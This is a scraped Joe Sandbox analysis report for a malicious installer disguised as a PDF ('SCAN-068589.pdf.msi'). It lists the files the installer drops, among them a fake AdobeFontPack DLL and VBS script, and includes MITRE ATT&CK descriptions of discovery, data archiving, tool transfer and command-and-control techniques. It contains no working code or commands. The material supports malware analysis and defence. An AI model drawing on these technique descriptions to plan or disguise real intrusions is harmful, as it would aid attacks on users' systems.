Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SCAN-068589.pdf.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\68bd59.rbs

C:\Users\user\AppData\Local\AdobeFontPack\main.dll

C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs

C:\Users\user\AppData\Local\Temp\~DF275DF4B13EC3E34F.TMP

C:\Users\user\AppData\Local\Temp\~DF6CBE8E5B62F6E221.TMP

C:\Users\user\AppData\Local\Temp\~DF84F6DE3826C4FEB0.TMP

C:\Users\user\AppData\Local\x86\5507.nls

C:\Windows\Installer\68bd57.msi

C:\Windows\Installer\68bd58.ipi

C:\Windows\Installer\68bd5a.msi

C:\Windows\Installer\MSI7D9A.tmp

C:\Windows\Installer\SourceHash{CC038BA5-7236-4713-8948-DFF082243638}

Static File Info

General

File Icon

Static OLE Info

General

Authenticode Signature

OLE File "SCAN-068589.pdf.msi"

Windows Analysis Report
SCAN-068589.pdf.msi

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre